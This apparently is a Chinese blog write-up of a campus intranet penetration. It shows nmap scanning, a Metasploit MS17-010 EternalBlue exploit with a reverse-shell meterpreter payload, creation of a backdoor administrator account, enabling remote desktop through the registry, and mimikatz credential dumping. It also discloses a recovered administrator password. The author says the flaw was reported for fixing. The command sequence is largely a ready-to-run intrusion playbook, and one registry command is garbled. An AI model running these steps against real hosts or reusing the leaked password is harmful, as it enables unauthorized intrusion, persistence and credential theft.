【实战】记一次简单的校园内网渗透

2022-03-02 10:34:58 浏览数 (1)

一次划水

首先用NMAP扫描的时候,扫描出一个8888端口是http协议的。

于是我把查看了 网关IP拼接端口号 丢到了浏览器访问 (IP:8888);

suoga,,,果不其然是一个Ikuai路由管理后台。

BURP前去探路,爆破无果。(五此输入错误会锁定账户)

找了CVE,,,并且尝试利用。。发现漏洞不存在,,可能(搬迁机房)已经修复。

GET权限

2):服务器system权限获取

虽然拿不下路由权限,那么我们干脆换一种思路。

直接上NMAP简单的的信息收集一波,

代码语言:javascript复制
nmap -sP 192.168.10.254/24

查看目标机器开放的额信息

代码语言:javascript复制
nmap -sV 192.168.10.240

可以看出这是一台 winserver2008 R2 服务器 并且开放了445端口。

那么可以尝试MS017-010攻击。

查看本机IP Kali攻击机IP

接下来我们丢出美少妇,,就是一顿梭。。。

代码语言:javascript复制
search ms17-010
代码语言:javascript复制
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.10.240
set rport 445
exploit

利用

代码语言:javascript复制
use exploit/windows/smb/ms17_010_eternablue
set payload windows/x64/meterpreter/reverse_tcp
show options

设置参数

代码语言:javascript复制
set rhost 192.168.10.240
set lhost 192.168.4.36
set lport 4444
show options

EXPLOIT

(失败)第一次 好像被动静有点大。。

服务器被打蓝屏了,,导致会话建立失败。

第二次,尝试,,会话反弹。。。

WHOAMI??

远程登录

登录win2008服务器

添加 administered用户Cat00011cat Cat_00011_cat

windows server 2008 R2 命令行的方式如何创建用户和设置密码

windows server 2008 R2 命令行的方式如何创建用户和设置密码

windows server 2008 R2 命令行的方式如何创建用户和设置密码

一、使用命令行的方式创建用户、设置密码

打开命令提示符

net user username password / add

例如:建立一个名为Cat00011cat、密码为Cat_00011_cat 的用户

代码语言:javascript复制
net user Cat00011cat Cat_00011_cat /add

二、使用命令行修改旧帐户的密码

net user username password

例如:将用户Cat00011cat的密码设置为Cat_00011_cat

代码语言:javascript复制
net user Cat00011cat Cat_00011_cat 

三、使用命令行的方式创建本地组

net localgroup groupname /add

例如:添加一个名为sales的组

net localgroup sales /add

四、使用命令行的方式为本地组

net localgroup groupname username /add

例如:将用户名Cat00011cat加入到administrators组中

代码语言:javascript复制
net localgroup administrators Cat00011cat/ add

开启3389端口

代码语言:javascript复制
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /

run getgui -e //直接开启3389服务

发现用自己创建的账户并不能登录到目标主机,, 给administrator权限也不行。。 不知道啥原因。。。

最后只能load mimi拿超级管理员账号, 拿去hash解密。。

超级管理员信息: Administrator King2019

拿下PC

已上报协助修复

0 人点赞